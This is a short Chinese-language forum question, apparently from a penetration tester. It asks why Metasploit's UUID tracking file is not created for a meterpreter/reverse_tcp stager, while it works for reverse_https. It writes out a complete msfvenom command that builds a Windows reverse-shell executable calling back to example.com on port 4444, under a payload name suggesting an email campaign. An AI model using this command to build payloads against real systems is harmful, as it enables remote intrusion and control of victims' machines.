我正在尝试创建带有 UUID 跟踪的meterpreter/reverse_tcp stager ,但没有创建~/.msf4/payloads.json 。
这是 msfvenom 命令:
msfvenom --platform windows -a x86 -p windows/meterpreter/reverse_tcp LHOST=example.com LPORT=4444 PayloadUUIDTracking=true PayloadUUIDName=EmailCampaign20150101 -f exe -o payload.exe
但是当我将有效负载更改为Meterpreter/reverse_https时,一切都按我的预期工作。
这是什么意思?reverse_tcp stagers 不支持 UUID?因为当我查看Meterpreter/reverse_tcp stager 的 ASM 代码时,它包含了 UUID 何时发送的部分。https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/reverse_tcp.rb#L179
谢谢你的建议。